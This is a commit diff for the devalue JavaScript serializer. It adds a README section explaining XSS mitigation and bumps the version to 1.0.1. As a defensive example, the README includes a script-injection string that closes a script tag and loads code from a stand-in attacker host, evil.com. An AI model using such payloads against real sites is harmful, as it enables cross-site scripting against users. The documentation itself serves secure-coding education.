-> v1.0.1

Rich-Harris · Rich-Harris · commit 1aae8055859b · 2018-03-10T18:55:59.000-05:00
diff --git a/CHANGELOG.md b/CHANGELOG.md
@@ -1,4 +1,8 @@
-# TODO changelog
+# devalue changelog
+
+## 1.0.1
+
+* XSS mitigation ([#1](https://github.com/Rich-Harris/devalue/issues/1))
 
 ## 1.0.0
 
diff --git a/README.md b/README.md
@@ -14,6 +14,7 @@ Try it out on [runkit.com](https://npm.runkit.com/devalue).
 ## Goals:
 
 * Performance
+* Security (see [XSS mitigation](#xss-mitigation))
 * Compact output
 
 
@@ -40,6 +41,53 @@ devalue(obj); // '(function(a){a.a=1;a.b=2;a.c=3;a.self=a;return a}({}))'
 If `devalue` encounters a function or a non-POJO, it will throw an error.
 
 
+## XSS mitigation
+
+Say you're server-rendering a page and want to serialize some state, which could include user input. `JSON.stringify` doesn't protect against XSS attacks:
+
+```js
+const state = {
+  userinput: `</script><script src='https://evil.com/mwahaha.js'>`
+};
+
+const template = `
+<script>
+  // NEVER DO THIS
+  var preloaded = ${JSON.stringify(state)};
+</script>`;
+```
+
+Which would result in this:
+
+```html
+<script>
+  // NEVER DO THIS
+  var preloaded = {"userinput":"</script><script src='https://evil.com/mwahaha.js'>"};
+</script>
+```
+
+Using `devalue`, we're protected against that attack:
+
+```js
+const template = `
+<script>
+  var preloaded = ${devalue(state)};
+</script>`;
+```
+
+```html
+<script>
+  var preloaded = {userinput:"\\u003C\\u002Fscript\\u003E\\u003Cscript src=\'https:\\u002F\\u002Fevil.com\\u002Fmwahaha.js\'\\u003E"};
+</script>
+```
+
+This, along with the fact that `devalue` bails on functions and non-POJOs, stops attackers from executing arbitrary code. Strings generated by `devalue` can be safely deserialized with `eval` or `new Function`:
+
+```js
+const value = eval('(' + str + ')');
+```
+
+
 ## See also
 
 * [lave](https://github.com/jed/lave) by Jed Schmidt
diff --git a/package.json b/package.json
@@ -1,7 +1,7 @@
 {
   "name": "devalue",
   "description": "Gets the job done when JSON.stringify can't",
-  "version": "1.0.0",
+  "version": "1.0.1",
   "repository": "Rich-Harris/devalue",
   "main": "dist/devalue.umd.js",
   "module": "dist/devalue.esm.js",

Original file line number	Diff line number	Diff line change
`@@ -1,7 +1,7 @@`
`1`	`1`	`{`
`2`	`2`	`"name": "devalue",`
`3`	`3`	`"description": "Gets the job done when JSON.stringify can't",`
`4`		`- "version": "1.0.0",`
	`4`	`+ "version": "1.0.1",`
`5`	`5`	`"repository": "Rich-Harris/devalue",`
`6`	`6`	`"main": "dist/devalue.umd.js",`
`7`	`7`	`"module": "dist/devalue.esm.js",`